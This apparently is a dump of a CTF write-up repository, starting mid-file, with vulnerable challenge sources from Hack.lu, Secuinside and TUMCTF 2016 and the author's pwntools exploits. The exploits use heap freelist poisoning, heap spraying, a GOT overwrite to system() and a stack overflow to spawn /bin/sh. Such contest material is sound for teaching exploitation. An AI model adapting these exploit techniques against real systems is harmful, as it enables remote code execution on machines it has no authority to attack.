17 |   if (syscall(__NR_memfd_create, "safe control stack", 0) != 3)
18 |     err(1, "memfd creation failed");
19 | */
20 |   if (open("/tmp/", O_TMPFILE|O_RDWR|O_EXCL) != 3)
21 |     err(1, "tmpfd creation failed");
22 |   DO_app_main(argv[1]);
23 | }
24 | 


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/launch.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/dataonly/dataonly_release/launch.i64


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/main.c:
--------------------------------------------------------------------------------
  1 | #include <x86_64-linux-gnu/asm/unistd_64.h>
  2 | #include <asm-generic/mman-common.h>
  3 | #include <asm-generic/fcntl.h>
  4 | 
  5 | #define size_t unsigned long
  6 | #define NULL ((void*)0)
  7 | #define false 0
  8 | #define true 1
  9 | #define bool int
 10 | 
 11 | #define STDIN_FD 0
 12 | #define STDOUT_FD 1
 13 | #define STACK_FD 3
 14 | 
 15 | 
 16 | /* syscall wrapper, accepts up to 5 arguments after the syscall number */
 17 | extern long DO_syscall(int syscall, ...);
 18 | 
 19 | 
 20 | /* ==== syscalls and important low-level stuff ==== */
 21 | void DO_fatal(char *str);
 22 | 
 23 | long DO_sys_read(int fd, char *buf, size_t len) {
 24 |   if (fd == STACK_FD)
 25 |     DO_fatal("error: bad fd passed to DO_sys_read\n");
 26 |   return DO_syscall(__NR_read, fd, buf, len);
 27 | }
 28 | 
 29 | long DO_sys_write(int fd, char *buf, size_t len) {
 30 |   if (fd == STACK_FD)
 31 |     DO_fatal("error: bad fd passed to DO_sys_write\n");
 32 |   return DO_syscall(__NR_write, fd, buf, len);
 33 | }
 34 | 
 35 | void *DO_mmap(size_t length) {
 36 |   // TODO add arg6 and properly zero it
 37 |   void *res = (void*)DO_syscall(__NR_mmap, NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0);
 38 |   if ((unsigned long)res > (unsigned long)-4096)
 39 |     DO_fatal("error: mmap failed\n");
 40 |   return res;
 41 | }
 42 | 
 43 | void DO_sys_exit_group(int status) {
 44 |   DO_syscall(__NR_exit_group, status);
 45 | }
 46 | 
 47 | void DO_exit(int status) {
 48 |   while (1) DO_sys_exit_group(status);
 49 | }
 50 | 
 51 | size_t DO_strlen(char *str) {
 52 |   size_t res = 0;
 53 |   while (*str != '\0') {
 54 |     str++;
 55 |     res++;
 56 |   }
 57 |   return res;
 58 | }
 59 | 
 60 | void DO_write(char *str) {
 61 |   DO_sys_write(STDOUT_FD, str, DO_strlen(str));
 62 | }
 63 | 
 64 | void DO_fatal(char *str) {
 65 |   DO_write(str);
 66 |   DO_exit(1);
 67 | }
 68 | 
 69 | void DO_memcpy(void *dst, void *src, size_t len) {
 70 |   char *dst_ = dst;
 71 |   char *src_ = src;
 72 |   while (len--)
 73 |     *(dst_++) = *(src_++);
 74 | }
 75 | 
 76 | bool DO_streq(char *a, char *b) {
 77 |   while (1) {
 78 |     if (*a != *b)
 79 |       return false;
 80 |     if (*a == '\0')
 81 |       return true;
 82 |     a++;
 83 |     b++;
 84 |   }
 85 | }
 86 | 
 87 | int DO_sys_open(char *path) {
 88 |   int res = DO_syscall(__NR_open, path, O_RDONLY);
 89 |   return res;
 90 | }
 91 | 
 92 | void DO_sys_close(int fd) {
 93 |   if (fd == STACK_FD)
 94 |     DO_fatal("error: tried to close STACK_FD\n");
 95 |   DO_syscall(__NR_close, fd);
 96 | }
 97 | 
 98 | 
 99 | 
100 | /* ==== malloc ==== */
101 | #define MALLOC_NR_OF_SIZES 10
102 | 
103 | void *malloc_freelist_heads[MALLOC_NR_OF_SIZES];
104 | char *malloc_area_head;
105 | char *malloc_next_alloc;
106 | size_t malloc_area_size = 10 * 4096 * 4096; // 10MB of heap are enough for everyone
107 | 
108 | 
109 | // allocate memory for custom implemented heap.
110 | void DO_setup_malloc(void) {
111 |   malloc_area_head = DO_mmap(malloc_area_size);
112 |   malloc_next_alloc = malloc_area_head;
113 | }
114 | 
115 | 
116 | #define CHUNK_SIZE_BY_IDX(idx) (1 << (idx + 4))
117 | size_t DO_chunk_size_by_idx(int idx) {
118 |   if (idx < 0 || idx > MALLOC_NR_OF_SIZES - 1)
119 |     DO_fatal("error: bad chunk size idx");
120 |   return CHUNK_SIZE_BY_IDX(idx);
121 | }
122 | 
123 | int DO_chunk_idx_by_len(size_t len) {
124 |   if (len > CHUNK_SIZE_BY_IDX(MALLOC_NR_OF_SIZES-1))
125 |     DO_fatal("error: too big for malloc\n");
126 |   int chunk_idx = 0;
127 |   while (CHUNK_SIZE_BY_IDX(chunk_idx) < len)
128 |     chunk_idx++;  
129 |   return chunk_idx;
130 | }
131 | 
132 | void *DO_malloc(size_t len) {
133 |   if ((long)len == -1)
134 |     DO_fatal("error: absurdly huge memory allocation\n");
135 |   len++;
136 | 
137 |   int idx = DO_chunk_idx_by_len(len);
138 | 
139 |   char *res = malloc_freelist_heads[idx];
140 |   if (res == NULL) {
141 |     len = DO_chunk_size_by_idx(idx);
142 |     if (malloc_area_size - (malloc_next_alloc - malloc_area_head) <= len)
143 |       DO_fatal("error: out of heap space\n");
144 |     res = malloc_next_alloc;
145 |     malloc_next_alloc += len;
146 |   } else {
147 |     malloc_freelist_heads[idx] = *(void**)res;
148 |   }
149 |   res[0] = idx;
150 |   return res + 1;
151 | }
152 | 
153 | void DO_free(void *ptr) {
154 |   if (ptr == NULL)
155 |     return;
156 |   ptr = ((char*)ptr)-1;
157 |   int idx = *(char*)ptr;
158 | 
159 |   *(void**)ptr = malloc_freelist_heads[idx];
160 |   malloc_freelist_heads[idx] = ptr;
161 | }
162 | 
163 | /* ==== application code ==== */
164 | char *webroot;
165 | char *language;
166 | 
167 | char DO_readbyte(void) {
168 |   char c;
169 |   long res = DO_sys_read(STDIN_FD, &c, 1);
170 |   if (res == 0)
171 |     DO_exit(0);
172 |   if (res != 1)
173 |     DO_fatal("error: read failed\n");
174 |   return c;
175 | }
176 | 
177 | char *DO_readline(size_t *outlen) {
178 |   // buffer overflow !!
179 |   size_t len = CHUNK_SIZE_BY_IDX(MALLOC_NR_OF_SIZES-1) - 1;
180 |   char *buf = DO_malloc(len);
181 |   char *p = buf;
182 |   while (1) {
183 |     *p = DO_readbyte();
184 |     if (*p == '\n') {
185 |       *p = '\0';
186 |       if (outlen)
187 |         *outlen = p - buf;
188 |       break;
189 |     }
190 |     p++;
191 |   }
192 |   return buf;
193 | }
194 | 
195 | void DO_send_file(char *path) {
196 |   size_t root_len = DO_strlen(webroot);
197 |   size_t path_len = DO_strlen(path);
198 | 
199 |   for (int i=0; i<(long)path_len - 1; i++) {
200 |     if (path[i] == '.' && path[i+1] == '.') {
201 |       DO_write("would be kinda lame if that worked...\n");
202 |       return;
203 |     }
204 |   }
205 | 
206 |   char *full_path = DO_malloc(root_len + path_len + 1);
207 |   DO_memcpy(full_path, webroot, root_len);
208 |   DO_memcpy(full_path + root_len, path, path_len + 1);
209 |   int fd = DO_sys_open(full_path);
210 |   if (fd < 0) {
211 |     DO_write("unable to open file\n");
212 |   } else {
213 |     char *tmp = DO_malloc(4095);
214 |     while (1) {
215 |       long res = DO_sys_read(fd, tmp, 4095);
216 |       if (res <= 0)
217 |         break;
218 |       DO_sys_write(STDOUT_FD, tmp, res);
219 |     }
220 |     DO_free(tmp);
221 |     DO_sys_close(fd);
222 |   }
223 |   DO_free(full_path);
224 | }
225 | 
226 | void DO_set_language(void) {
227 |   DO_free(language);
228 |   language = NULL;
229 |   size_t linelen;
230 |   char *new_language = DO_readline(&linelen);
231 |   if (*new_language) {
232 |     // save memory
233 |     language = DO_malloc(linelen+1);
234 |     DO_memcpy(language, new_language, linelen + 1);
235 |   }
236 |   DO_free(new_language);
237 | }
238 | 
239 | void DO_app_main(char *webroot_) {
240 |   webroot = webroot_;
241 |   DO_setup_malloc();
242 | 
243 |   while (1) {
244 |     char *command = DO_readline(NULL);
245 |     if (language != NULL && DO_streq(language, "german")) {
246 |       if (DO_streq(command, "hole")) {
247 |         DO_write("kommando verstanden, bitte pfad senden\n");
248 |         char *path = DO_readline(NULL);
249 |         DO_send_file(path);
250 |         DO_free(path);
251 |       } else if (DO_streq(command, "sprache")) {
252 |         DO_set_language();
253 |       } else if (DO_streq(command, "hilfe")) {
254 |         DO_write("hole: hole datei - sende pfad in neuer zeile\n");
255 |         DO_write("sprache: sprache aendern - sende name der sprache in neuer zeile\n");
256 |         DO_write("hilfe: zeige diese hilfe\n");
257 |         DO_write("ende: verbindung schliessen\n");
258 |       } else if (DO_streq(command, "ende")) {
259 |         DO_write("tschuess!\n");
260 |         DO_exit(0);
261 |       } else {
262 |         DO_write("unbekanntes kommando - sende \"hilfe\" für hilfe\n");
263 |       }
264 |     } else { // must be english
265 |       if (DO_streq(command, "get")) {
266 |         DO_write("command understood, please send a path\n");
267 |         char *path = DO_readline(NULL);
268 |         DO_send_file(path);
269 |         DO_free(path);
270 |       } else if (DO_streq(command, "language")) {
271 |         DO_set_language();
272 |       } else if (DO_streq(command, "help")) {
273 |         DO_write("get: receive a file - send path on a separate line\n");
274 |         DO_write("language: set language - send name of new language on a separate line\n");
275 |         DO_write("help: show this help\n");
276 |         DO_write("quit: let the server terminate the connection\n");
277 |       } else if (DO_streq(command, "quit")) {
278 |         DO_write("bye!\n");
279 |         DO_exit(0);
280 |       } else {
281 |         DO_write("bad command - try sending \"help\" for help\n");
282 |       }
283 |     }
284 |     DO_free(command);
285 |   }
286 | }
287 | 


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/mallocs:
--------------------------------------------------------------------------------
 1 | 1. readline for first command
 2 | 2. enter get
 3 | 3. enter path with len 8k end contains ..
 4 | 4. path free
 5 | 5. command free
 6 | 
 7 | Freelist:
 8 | free command -> free path buffer
 9 | 
10 | 6. next command - overflow 2nd buffer fwd ptr
11 | 7. enter language - gets 1st buffer
12 | 8. length - gets 2nd buffer and global language ptr will be controlled !
13 | 8. Overwrite !!
14 | 
15 | 
16 | 
17 | Need short buffer
18 | ---------------------------------------
19 | 1. readline for first command
20 | 2. enter language
21 | 3. enter language with len < 7
22 | 
23 | 4. memory after set_language - 
24 | 
25 | heap: *command | *new_language | language
26 | freelist:
27 | 	idx10: command -> new_language
28 | 
29 | 5. enter language command
30 | 6. enter language with big len
31 | 7. memory after set_language - 
32 | 
33 | heap: *command | *new_language | *language | big_language
34 | freelist:
35 | 	idx10: 	command -> new_language
36 | 	idx1:	language
37 | 
38 | 8. overflow language with fwd = ADDRESS.
39 | 9. enter language command
40 | 10. enter language with len < 7
41 | 11. memory after set_language - 
42 | 
43 | heap: idx10-*command | idx10-*new_language | idx0-language | idx10-*big_language
44 | freelist:
45 | 	idx10: 	command -> big_language -> new_language
46 | 	idx0:	ADDR
47 | 
48 | 
49 | 12. overwrite language idx with invalid command
50 | 13. enter language command with len < 16
51 | 14. memory after set_language - 
52 | 
53 | heap: idx10-*command | idx10-*new_language | idxFAKE-language | idx10-*big_language
54 | freelist:
55 | 	idx10: 	command -> big_language -> new_language
56 | 	idx0:	STRING_ADDR


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/public/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |     <title>Hello World!</title>
 5 |   </head>
 6 |   <body>
 7 |     Hello World!
 8 |   </body>
 9 | </html>
10 | 


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/server:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/dataonly/dataonly_release/server


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/server.c:
--------------------------------------------------------------------------------
 1 | #define _GNU_SOURCE
 2 | #include <assert.h>
 3 | #include <err.h>
 4 | #include <unistd.h>
 5 | #include <signal.h>
 6 | #include <fcntl.h>
 7 | #include <stdio.h>
 8 | #include <sys/types.h>
 9 | #include <sys/socket.h>
10 | #include <sys/stat.h>
11 | #include <netinet/ip.h>
12 | #include <netinet/tcp.h>
13 | 
14 | #define LISTEN_PORT 1605
15 | #define WEBROOT "./public/"
16 | 
17 | void enter_main(int s) {
18 |   if (dup2(s, 0) != 0 || dup2(s, 1) != 1)
19 |     err(1, "dup2");
20 |   close(s);
21 |   execl("./launch", "launch", WEBROOT, NULL);
22 |   err(1, "execve failed");
23 | }
24 | 
25 | int main(void) {
26 |   signal(SIGCHLD, SIG_IGN);
27 | 
28 |   int ssock = socket(AF_INET, SOCK_STREAM, 0);
29 |   if (ssock == -1)
30 |     err(1, "socket");
31 |   if (setsockopt(ssock, SOL_SOCKET, SO_REUSEADDR, &(int){1}, sizeof(int)))
32 |     err(1, "setsockopt");
33 |   struct sockaddr_in addr = {
34 |     .sin_family = AF_INET,
35 |     .sin_port = htons(LISTEN_PORT),
36 |     .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) }
37 |   };
38 |   if (bind(ssock, (struct sockaddr *)&addr, sizeof(addr)))
39 |     err(1, "bind");
40 |   if (listen(ssock, 32))
41 |     err(1, "listen");
42 | 
43 |   while (1) {
44 |     int s = accept(ssock, NULL, NULL);
45 |     if (s == -1) {
46 |       perror("accept() failed; retrying in a second");
47 |       sleep(1);
48 |       continue;
49 |     }
50 | retry_fork:;
51 |     pid_t child = fork();
52 |     if (child == -1) {
53 |       perror("fork() failed; retrying in a second");
54 |       sleep(1);
55 |       goto retry_fork;
56 |     }
57 |     if (child == 0) {
58 |       close(ssock);
59 |       enter_main(s);
60 |     }
61 |     close(s);
62 |   }
63 | }
64 | 


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | ADDR_TO_OVERWRITE = p64(0x601f1f)
 4 | 
 5 | def exploit1():
 6 | 	p = process('./launch public/', shell=True)
 7 | 	raw_input()
 8 | 
 9 | 	log.info('start')
10 | 	p.sendline('get')
11 | 	p.sendline('../' + 'A'*8190)
12 | 	p.sendline('A'*8191 + ADDR_TO_OVERWRITE)
13 | 	p.sendline('language')
14 | 	p.sendline('L'*(2**12-1))
15 | 	return p
16 | 
17 | def exploit():
18 | 	# p = process('./launch public/', shell=True)
19 | 	p = remote('cthulhu.fluxfingers.net', 1509)
20 | 
21 | 	log.info('start')
22 | 	
23 | 	p.sendline('language')
24 | 	p.sendline('A'*8)
25 | 
26 | 	p.sendline('language')
27 | 	p.sendline('A'*(2**12 + 5))
28 | 
29 | 	# overflowing
30 | 	p.sendline('A'*(8191 + 8192) + ADDR_TO_OVERWRITE)
31 | 
32 | 	p.sendline('language')
33 | 	p.sendline('A'*8)
34 | 
35 | 	# overflowing
36 | 	p.sendline('A'*(8191 + 8192) + '\x05')
37 | 
38 | 	p.sendline('language')
39 | 	p.sendline('\x11')
40 | 
41 | 	p.sendline('get')
42 | 	p.sendline('///////////////////////flag')
43 | 	p.interactive()
44 | 	return p


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Writeups for CTFs challenges
2 | 


--------------------------------------------------------------------------------
/Secuinside 2016/byhuman/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Secuinside 2016/byhuman/README.md


--------------------------------------------------------------------------------
/Secuinside 2016/byhuman/bh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Secuinside 2016/byhuman/bh


--------------------------------------------------------------------------------
/Secuinside 2016/byhuman/exploit.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | import sys
  3 | import struct
  4 | 
  5 | BIN = '/home/daniel/Desktop/files/bh'
  6 | TYPES = {'ITEM': 0, 'NUMBER': 1, 'STRING': 2, 'STORAGE': 3}
  7 | OPCODES = {'ADD': 0, 'DEFINE': 1, 'JUMP': 2, 'SET': 3, 'EVAL': 4, 'IF': 5, 'RETURN': 6, 'CONVERT': 7}
  8 | LIBC_ADDR_GUESS = 0xf748b000
  9 | SYSTEM_OFFSET_IN_LIBC = 0x3fe70
 10 | 
 11 | class Item(object):
 12 |     def __init__(self):
 13 |         self._type = TYPES['ITEM']
 14 | 
 15 |     def encode_with_type(self):
 16 |         return p8(self._type) + self.encode()
 17 | 
 18 |     def encode(self):
 19 |         pass
 20 | 
 21 | class Number(Item): 
 22 |     def __init__(self, n):
 23 |         self._n = n
 24 |         self._type = TYPES['NUMBER']
 25 | 
 26 |     def encode(self):
 27 |         return p32(self._n)
 28 | 
 29 | class String(Item):
 30 |     def __init__(self, s):
 31 |         self._s = s
 32 |         self._type = TYPES['STRING']
 33 | 
 34 |     def encode(self):
 35 |         return Number(len(self._s)).encode() + self._s
 36 | 
 37 | class Storage(Item):
 38 |     def __init__(self, d):
 39 |         self._d = {}
 40 |         types_convert = {str: String, int: Number, dict: Storage}
 41 |         self._type = TYPES['STORAGE']
 42 | 
 43 |         for k in d:
 44 |         	if not isinstance(k, str):
 45 |         		raise Exception('Invalid key type')
 46 | 
 47 |         	if type(d[k]) not in types_convert:
 48 |         		raise Exception('Invalid value type')
 49 | 
 50 |         	new_key = String(k)
 51 |         	new_val = types_convert[type(d[k])](d[k])
 52 |         	self._d[new_key] = new_val
 53 | 
 54 | 
 55 |     def encode(self):
 56 |         res = Number(len(self._d)).encode()
 57 |         for k in self._d:
 58 |             res += k.encode_with_type()
 59 |             res += self._d[k].encode_with_type()
 60 |         return res
 61 | 
 62 | 
 63 | class Run(object):
 64 |     def __init__(self):
 65 |         self._p = process(BIN)
 66 |         self.recv_welcome_msg()
 67 | 
 68 |     def recv_welcome_msg(self):
 69 |         for i in xrange(3):
 70 |         	line = self.recv_buffer()
 71 |             # sys.stdout.write(line)
 72 | 
 73 |     def recv_buffer(self):
 74 |         try:
 75 |             l = u32(self._p.recv(4, timeout=1))
 76 |             d = self._p.recv(l, timeout=1)
 77 |         except:
 78 |             return ''
 79 |         return d
 80 | 
 81 |     def send_buffer(self, buf):
 82 |         pickle = p32(len(buf)) + buf
 83 |         # print 'Sending ' + pickle.encode('hex')
 84 |         self._p.send(pickle)
 85 | 
 86 |     def add(self, id1, id2):
 87 |     	pickle = p8(OPCODES['ADD'])
 88 |     	pickle += p8(id1)
 89 |     	pickle += p8(id2)
 90 | 
 91 |     	return pickle
 92 | 
 93 |     def set(self, storage_id, key_id, val_id):
 94 |         pickle = p8(OPCODES['SET'])
 95 |     	pickle += p8(storage_id)
 96 |     	pickle += p8(key_id)
 97 |     	pickle += p8(val_id)
 98 | 
 99 |     	return pickle
100 | 
101 |     def convert(self, id_to_convert, new_type):
102 |         pickle = p8(OPCODES['CONVERT'])
103 |         pickle += p8(id_to_convert)
104 |         pickle += p8(TYPES[new_type])
105 | 
106 |         return pickle
107 | 
108 |     def define(self, item):
109 |         pickle = p8(OPCODES['DEFINE'])
110 |         pickle += item.encode_with_type()
111 | 
112 |         return pickle
113 | 
114 |     def return_id(self, id_to_ret):
115 |         pickle = p8(OPCODES['RETURN'])
116 |         pickle += p8(id_to_ret)
117 | 
118 |         return pickle
119 | 
120 |     def send_command(self, pickle):
121 |     	self.send_buffer(pickle)
122 |         return self.recv_buffer()
123 | 
124 |     def pasten(self):
125 | 
126 |     	# construct the storage
127 |         pickle = self.define(Storage({}))
128 |         for i in xrange(10):
129 |             pickle += self.define(String('a'))
130 |             pickle += self.define(Number(1))
131 | 
132 |             pickle += self.set(0, 2*i + 1, 2*i + 2)
133 | 
134 |         pickle += self.define(Number(0xAAAA))
135 |         self.send_command(pickle)
136 | 
137 |         # free the storage elements
138 |         pickle = ''
139 |         for i in xrange(10):
140 |             pickle += self.set(0, 2*i + 1, 2*i + 2)
141 | 
142 |         pickle += self.define(Number(0xBBBB))
143 |         self.send_command(pickle)
144 | 
145 |         # clobber refs[15] vftable, and make it looks like <vftable>/bin/sh\n, and the vftable will be whitespaces in ascii.
146 |         # system() ignores the whitespaces
147 |         # the number define is for that the result from the pickle will be valid.
148 |         self.send_command('\x0a\x0a\x0a\x0a/bin/sh\x0a' + self.define(Number(0XCCCC)))
149 | 
150 |         dummy_id = int(self.send_command(self.define(Number(0XDDDD))))
151 | 
152 |         # 0xf7d50e70 - addr of system in libc without aslr
153 |         system_addr = LIBC_ADDR_GUESS + SYSTEM_OFFSET_IN_LIBC
154 |         addr = struct.pack('<I', system_addr)
155 |         addr = addr[2:] + addr[0:2]
156 | 
157 |         print 'Trying with system address of', str(system_addr), 'and in string -', addr.encode('hex')
158 | 
159 |         # heap spray
160 |         for i in xrange(0x300):
161 |             self.send_command(addr*0x4000 + self.return_id(dummy_id))
162 | 
163 |         self.send_command(self.return_id(15))
164 | 
165 |         self._p.send('id\n')
166 |         self._p.recv(1)
167 | 
168 |     	print '----------------------- Attack Succseeded ! -----------------------'
169 |     	self._p.interactive()
170 | 
171 | def attack():
172 |     i = 0
173 |     while True:
174 |         r = Run()
175 |         try:
176 |             print 'Try number', str(i)
177 |             r.pasten()
178 |             break
179 |         except:
180 |             pass
181 | 
182 |         i += 1


--------------------------------------------------------------------------------
/TUMCTF 2016/l1br4ry/exploit.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | from time import sleep
  3 | 
  4 | PROCESS_NAME = 'l1br4ry'
  5 | OFFSET_LEAKED_HEAP_ADDRESS = +0x200
  6 | STROUL_GOT_ENTRY_ADDRESS = 0x602070
  7 | STRTOUL_SYSTEM_OFFSET = +0x9180
  8 | 
  9 | def add_book(p, title, description, rating):
 10 | 	p.sendline('a')
 11 | 
 12 | 	for elem in [title, rating, description]:
 13 | 		p.recvuntil(': ')
 14 | 		p.sendline(str(elem))
 15 | 
 16 | def delete_book(p, book_index):
 17 | 	p.sendline(str(book_index))
 18 | 	p.recvuntil('> ')
 19 | 	p.sendline('d')
 20 | 
 21 | def make_favorite(p, book_index):
 22 | 	p.sendline(str(book_index))
 23 | 	p.recvuntil('> ')
 24 | 	p.sendline('f')
 25 | 
 26 | def edit_book(p, book_index, new_title, new_rating, revision):
 27 | 	p.sendline(str(book_index))
 28 | 	p.recvuntil('> ')
 29 | 	p.sendline('e')
 30 | 
 31 | 	for elem in [(': ', new_title), ('): ', new_rating), ('n: ', revision)]:
 32 | 		p.recvuntil(elem[0])
 33 | 		p.sendline(str(elem[1]))
 34 | 
 35 | def main():
 36 | 	p = process(PROCESS_NAME)
 37 | 	p.recvuntil('> ')
 38 | 
 39 | 	with log.progress('Creating books array...') as prog:
 40 | 		for i in xrange(10):
 41 | 			prog.status('Book - ' + str(i))
 42 | 			add_book(p, 'hey' + str(i+1), 'bye', 3)
 43 | 			p.recvuntil('> ')
 44 | 			sleep(0.5)
 45 | 
 46 | 	log.info('Set favorite book as 6')
 47 | 	make_favorite(p, 5)
 48 | 	p.recvuntil('> ')
 49 | 
 50 | 	with log.progress('Deleting books from array...') as prog:
 51 | 		for i in [8, 7, 6]:
 52 | 			prog.status('Deletes book - ' + str(i))
 53 | 			delete_book(p, i)
 54 | 			p.recvuntil('> ')
 55 | 			sleep(0.5)
 56 | 
 57 | 	log.info('Adding one more book...')
 58 | 	add_book(p, 'hey11', 'bye', 3)
 59 | 	p.recvline()
 60 | 	p.recvline()
 61 | 	p.recvline()
 62 | 	books_list = p.recvline()
 63 | 	p.recvuntil('> ')
 64 | 
 65 | 	# now books array == favorite book.
 66 | 
 67 | 	# leak heap address
 68 | 	heap_address = u64(books_list[20:-1] + '\x00'*(8-len(books_list[20:-1])))
 69 | 	log.success('Leaked heap address - ' + hex(heap_address))
 70 | 	log.success('Buffer/Favorite Book address - ' + hex(heap_address + OFFSET_LEAKED_HEAP_ADDRESS))
 71 | 
 72 | 	with log.progress('Deleting all books...') as prog:
 73 | 		for i in xrange(7):
 74 | 			delete_book(p, 1)
 75 | 			p.recvuntil('> ')
 76 | 			sleep(0.5)
 77 | 
 78 | 	# leak stroul libc address
 79 | 	log.info('Put strtoul() got entry address as name of the first book.')
 80 | 
 81 | 	edit_book(p, 0, p64(STROUL_GOT_ENTRY_ADDRESS), 10, "hey")
 82 | 	p.recvline()
 83 | 	p.recvline()
 84 | 	p.recvline()
 85 | 	p.recvline()
 86 | 	books_list = p.recvline()
 87 | 	p.recvuntil('> ')
 88 | 	stroul_address = u64(books_list[5:-1] + '\x00'*(8-len(books_list[5:-1])))
 89 | 	log.success('Leaked stroul address - ' + hex(stroul_address))
 90 | 
 91 | 	system_address = stroul_address + STRTOUL_SYSTEM_OFFSET
 92 | 	log.success('system() address - ' + hex(system_address))
 93 | 
 94 | 	# overwrite strtoul got.plt entry
 95 | 	log.info('Overwrite strtoul() got entry with system() address')
 96 | 	edit_book(p, 1, p64(system_address), '', '')
 97 | 	p.recvuntil('> ')
 98 | 
 99 | 	# get fucking shell
100 | 	p.sendline('/bin/sh')
101 | 	log.success('Baim !')
102 | 
103 | 	p.sendline('id')
104 | 
105 | 	p.interactive()
106 | 
107 | if __name__ == '__main__':
108 | 	main()
109 | 
110 |  


--------------------------------------------------------------------------------
/TUMCTF 2016/l1br4ry/l1br4ry:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/TUMCTF 2016/l1br4ry/l1br4ry


--------------------------------------------------------------------------------
/TUMCTF 2016/l1br4ry/l1br4ry.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/TUMCTF 2016/l1br4ry/l1br4ry.i64


--------------------------------------------------------------------------------
/TUMCTF 2016/lolcpp/lolcpp.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from time import sleep
 3 | 
 4 | PROCESS_NAME = 'vuln'
 5 | SYSTEM_ADDRESS = 0x400EA6
 6 | PASSWORD = 'todo: ldap and kerberos support\x00' + 40*'A' + p64(SYSTEM_ADDRESS)
 7 | 
 8 | def main():
 9 | 	p = process(PROCESS_NAME)
10 | 	p.recv(1024, timeout=1)
11 | 
12 | 	p.sendline('aaa')
13 | 
14 | 	p.recv(1024, timeout=1)
15 | 
16 | 	p.sendline(PASSWORD)
17 | 	p.recvline()
18 | 	p.recvline()
19 | 
20 | 	p.interactive()
21 | 
22 | if __name__ == '__main__':
23 | 	main()
24 | 
25 |  


--------------------------------------------------------------------------------
/TUMCTF 2016/lolcpp/vuln:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/TUMCTF 2016/lolcpp/vuln


--------------------------------------------------------------------------------
/TUMCTF 2016/lolcpp/vuln.cpp:
--------------------------------------------------------------------------------
  1 | #include <cstdint>
  2 | #include <cstdio>
  3 | #include <cstdlib>
  4 | #include <cstring>
  5 | #include <functional>
  6 | #include <memory>
  7 | #include <unistd.h>
  8 | 
  9 | 
 10 | constexpr size_t entry_len = 0x50;
 11 | 
 12 | void strip_newline(char *buf, size_t size) {
 13 | 	char *p = &size[buf];
 14 | 	while (p >= buf) {
 15 | 		if (0 == *p or '\n' == *p) {
 16 | 			*p = 0;
 17 | 		}
 18 | 		p--;
 19 | 	}
 20 | }
 21 | 
 22 | 
 23 | class User {
 24 | public:
 25 | 	User() {}
 26 | 	User(const char *name, const char *passwd) {
 27 | 		strncpy(this->name, name, sizeof(this->name));
 28 | 		strncpy(this->password, passwd, sizeof(this->password));
 29 | 	}
 30 | 
 31 | 	bool check_name(const char *name) {
 32 | 		return 0 == strcmp(this->name, name);
 33 | 	}
 34 | 
 35 | 	bool check_password(const char *passwd) {
 36 | 		return 0 == strcmp(this->password, passwd);
 37 | 	}
 38 | 
 39 | 	void read_name() {
 40 | 		char input[entry_len];
 41 | 		fgets(input, sizeof(input) - 1, stdin);
 42 | 		strip_newline(input, sizeof(input));
 43 | 		memcpy(this->name, input, sizeof(this->name));
 44 | 	}
 45 | 
 46 | 	void read_password() {
 47 | 		char input[entry_len];
 48 | 		fgets(input, sizeof(input) - 1, stdin);
 49 | 		strip_newline(input, sizeof(input));
 50 | 		memcpy(this->password, input, sizeof(this->password));
 51 | 	}
 52 | 
 53 | 	virtual const char *get_password() {
 54 | 		return this->password;
 55 | 	}
 56 | 
 57 | 	virtual void shell() {
 58 | 		printf("no shell for you!\n");
 59 | 	}
 60 | 
 61 | 	bool operator ==(const User &other) {
 62 | 		return (this->check_name(other.name)
 63 | 		        and this->check_password(other.password));
 64 | 	}
 65 | 
 66 | private:
 67 | 	char name[entry_len];
 68 | 	char password[entry_len];
 69 | };
 70 | 
 71 | class Noob : public User {
 72 | public:
 73 | 	virtual void shell() {
 74 | 		printf("ehehehe..!");
 75 | 	}
 76 | 
 77 | 	bool check_password(const char *) {
 78 | 		printf("noobs need no passwords!\n");
 79 | 		return false;
 80 | 	}
 81 | };
 82 | 
 83 | class Admin : public User {
 84 | public:
 85 | 	Admin(const char *name, const char *passwd)
 86 | 		:
 87 | 		User{name, passwd} {}
 88 | 
 89 | 	virtual void shell() {
 90 | 		printf("Hi admin!\n");
 91 | 		system("/bin/sh");
 92 | 	}
 93 | };
 94 | 
 95 | auto password_checker(void (*accepted)()) {
 96 | 	constexpr ssize_t equals = 0;
 97 | 	return [&](const char *input, const char *password) {
 98 | 		char buf[entry_len];
 99 | 		if (equals == strcmp(input, password)) {
100 | 			snprintf(buf, sizeof(buf), "password accepted: %s\n", buf);
101 | 			puts(buf);
102 | 			accepted();
103 | 		} else {
104 | 			printf("nope!\n");
105 | 		}
106 | 	};
107 | }
